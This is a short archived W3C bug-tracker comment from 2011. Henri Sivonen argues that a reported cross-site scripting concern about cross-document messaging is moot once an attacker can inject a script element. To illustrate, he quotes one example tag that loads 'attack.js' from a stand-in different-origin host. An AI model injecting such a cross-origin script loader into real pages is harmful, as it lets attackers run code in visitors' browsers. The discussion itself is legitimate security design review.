[Bug 12469] Dynamic Cross-Site Scripting and Page Repainting

http://www.w3.org/Bugs/Public/show_bug.cgi?id=12469

--- Comment #7 from Henri Sivonen <hsivonen@iki.fi> 2011-04-12 09:08:00 UTC ---
(In reply to comment #6)
> However, with respect, I think you have misinterpreted the idea of this
> exploit. The recvPayload function is in fact part of the injected code.

Ah. In that case, the attack needs the ability to inject a <script> element to
succeed. If you let the attacker inject a <script>, you have already lost
regardless of cross-document messaging. The injected script could load its
payload by using <script src="http://different-origin.example.com/attack.js">
which allows code to be loaded cross-origin.


Received on Tuesday, 12 April 2011 09:08:03 UTC